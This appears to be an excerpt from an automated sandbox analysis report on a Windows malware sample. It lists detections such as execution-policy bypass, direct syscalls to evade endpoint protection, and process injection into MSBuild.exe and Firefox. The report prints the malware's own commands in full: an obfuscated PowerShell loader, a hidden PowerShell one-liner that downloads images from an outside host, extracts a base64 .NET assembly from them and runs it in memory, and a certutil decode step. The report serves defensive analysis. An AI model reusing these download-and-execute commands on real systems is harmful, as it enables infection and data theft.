Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101245A mov eax, dword ptr fs:[00000030h]	10_2_0101245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100F460 mov eax, dword ptr fs:[00000030h]	10_2_0100F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100F460 mov eax, dword ptr fs:[00000030h]	10_2_0100F460

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_5804.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SyncHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: NULL target: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\SyncHost.exe

Thread APC queued: target process: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6E3008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredydgtrengdgtrevdgtredkdgtrenwdgtre4dgtrec8dgtrezgb1dgtregwdgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtref8dgtredgbidgtrehmdgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredidgtrenqdgtre4dgtredgdgtrendgtredgtre2dgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
